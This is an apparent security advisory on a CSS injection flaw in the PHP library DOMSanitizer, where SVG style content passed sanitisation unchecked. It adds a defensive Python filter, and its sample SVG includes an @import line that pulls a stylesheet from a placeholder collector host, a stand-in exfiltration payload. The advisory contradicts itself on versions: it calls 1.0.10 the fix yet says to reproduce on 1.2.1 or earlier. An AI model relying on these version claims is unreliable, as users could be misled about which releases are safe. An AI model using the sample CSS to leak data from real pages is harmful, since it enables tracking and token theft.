DOMSanitizer CSS Injection Vulnerability via Unfiltered SVG Style Content

Vulnerability

A CSS injection vulnerability has been identified in DOMSanitizer, a library for sanitizing DOM, SVG, and MathML content in PHP 7.3 and later. Prior to version 1.0.10, the 'sanitize' method allowed 'style' elements in SVG content but failed to inspect their text. This oversight permitted CSS 'url()' references and '@import' rules to pass through unfiltered. When the sanitized SVG is rendered, it can trigger HTTP requests to attacker-controlled hosts. The vulnerability arises because the 'style' tag is included in the allowed SVG elements, yet its content is not properly sanitized, allowing external resource requests.

Impact

Exploitation of this vulnerability could lead to unauthorized HTTP requests being made to attacker-controlled servers when the sanitized SVG is rendered in a browser. This could be used to exfiltrate information such as the page URL or to load malicious stylesheets. Additionally, in some browsers, it could facilitate the leakage of cookie or session token values through CSS attribute-selector tricks.

Reproduction

To reproduce this vulnerability, use DOMSanitizer version 1.2.1 or earlier. Pass an SVG string containing a 'style' element whose text includes 'url()' references or '@import' rules into the 'sanitize' method. The 'style' element is allowed through but its text is not inspected, so the 'url()' references or '@import' rules survive sanitization and are fetched by the browser when the SVG is rendered.
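The check the advisory says was missing (inspecting the text of allowed 'style' elements for 'url()' and '@import'), written as an added Python example that is not DOMSanitizer's own code: it reports offending 'style' bodies in an SVG string and strips those elements, the sort of post-processing a defender can run over 'sanitize' output on an unpatched install. The sample SVG and the host collector.invalid are constructed for the example.

```python
import re
import xml.etree.ElementTree as ET

SVG_URI = "http://www.w3.org/2000/svg"
ET.register_namespace("", SVG_URI)  # serialise without ns0: prefixes

# The two constructs the advisory names: url() references and @import rules.
# Case-insensitive, tolerant of whitespace before "(", and CSS comments are
# stripped first so a reference hidden inside /* ... */ is still caught.
_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)
_EXTERNAL_REF_RE = re.compile(r"url\s*\(|@import\b", re.I)

def _style_elements(root):
    """Yield every <style> element, namespaced or not, anywhere in the tree."""
    for el in root.iter():
        if el.tag in ("style", "{%s}style" % SVG_URI):
            yield el

def _css_body(el):
    return _COMMENT_RE.sub("", el.text or "")

def find_external_css_refs(svg_text):
    """Return the CSS bodies of <style> elements that would trigger a fetch."""
    root = ET.fromstring(svg_text)
    return [_css_body(el).strip() for el in _style_elements(root)
            if _EXTERNAL_REF_RE.search(_css_body(el))]

def strip_external_css(svg_text):
    """Remove each <style> whose body contains url() or @import. The whole
    element goes: rewriting CSS in place is error-prone, and an inline
    stylesheet that reaches out to the network has no place in sanitised output."""
    root = ET.fromstring(svg_text)
    parents = {child: parent for parent in root.iter() for child in parent}
    for el in list(_style_elements(root)):
        if _EXTERNAL_REF_RE.search(_css_body(el)) and el in parents:
            parents[el].remove(el)
    return ET.tostring(root, encoding="unicode")

# Constructed sample: one <style> that reaches out to an external host, one
# that is purely local. collector.invalid is a placeholder, not a real IoC.
SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <style>
    /* harmless rule */ rect { fill: red; }
    @import url("https://collector.invalid/leak.css");
  </style>
  <style>circle { stroke: blue; }</style>
  <rect width="10" height="10"/>
</svg>"""
```

Dropping the whole offending element also discards any harmless rules it contained; that is the conservative trade-off for output that must never trigger a network request.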

Remediation

Users can update to DOMSanitizer version 1.0.10 or later, where this vulnerability has been fixed.

Added: Apr 17, 2026, 10:03 PM
Updated: Apr 17, 2026, 10:03 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 0.2
exploitability: 7.7
remediation: 0.0
relevance: 6.1
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.